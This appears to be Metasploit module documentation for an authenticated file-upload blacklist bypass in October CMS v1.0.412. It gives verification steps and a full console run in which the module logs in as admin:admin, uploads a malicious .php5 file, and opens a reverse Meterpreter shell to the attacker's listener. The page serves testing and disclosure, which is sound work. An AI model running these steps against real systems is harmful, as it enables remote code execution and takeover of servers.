h00die
1.9 KiB
1.9 KiB
Description
An authenticated user with permission to upload and manage media contents can upload various files on the server. The application prevents the user from uploading PHP code by checking the file extension. It uses blacklist based approach, as seen in octobercms/vendor/october/rain/src/Filesystem/ Definitions.php:blockedExtensions().
Vulnerable Software
October CMS v1.0.412 (build 412) https://www.exploit-db.com/apps/4ff8a9688f31b7338020d0bc85da13fc-october-1.0.412.tar.gz
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/multi/http/october_upload_bypass_exec - Do: ```set RHOSTS ``
- Do:
set USERNAME <user> - Do:
set PASSWORD <pass> - You should get a shell.
Verification Steps
msf5 > use exploit/multi/http/october_upload_bypass_exec
msf5 exploit(multi/http/october_upload_bypass_exec) > set rhosts 10.10.10.16
rhosts => 10.10.10.16
msf5 exploit(multi/http/october_upload_bypass_exec) > setg verbose true
verbose => true
msf5 exploit(multi/http/october_upload_bypass_exec) > set lhost 10.10.14.8
lhost => 10.10.14.8
msf5 exploit(multi/http/october_upload_bypass_exec) > run
[*] Started reverse TCP handler on 10.10.14.8:4444
[+] Token for login : 3ySsc8d8VNMm2V8x3Ns4cay05bwhRxnoIkQjRnBP
[+] Session Key for login : uVNSZ2YRUm39cf8kqJcWV0qr9xhqq9krCYHeVI6m
[*] Trying to Login ......
[+] Authentication successful: admin:admin
[*] Trying to upload malicious WLMVDKmVpCX.php5 file ....
[*] Sending stage (38247 bytes) to 10.10.10.16
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.16:54124) at 2019-09-03 12:19:20 +0530
[+] Deleted WLMVDKmVpCX.php5
meterpreter > sysinfo
Computer : october
OS : Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686
Meterpreter : php/linux
meterpreter >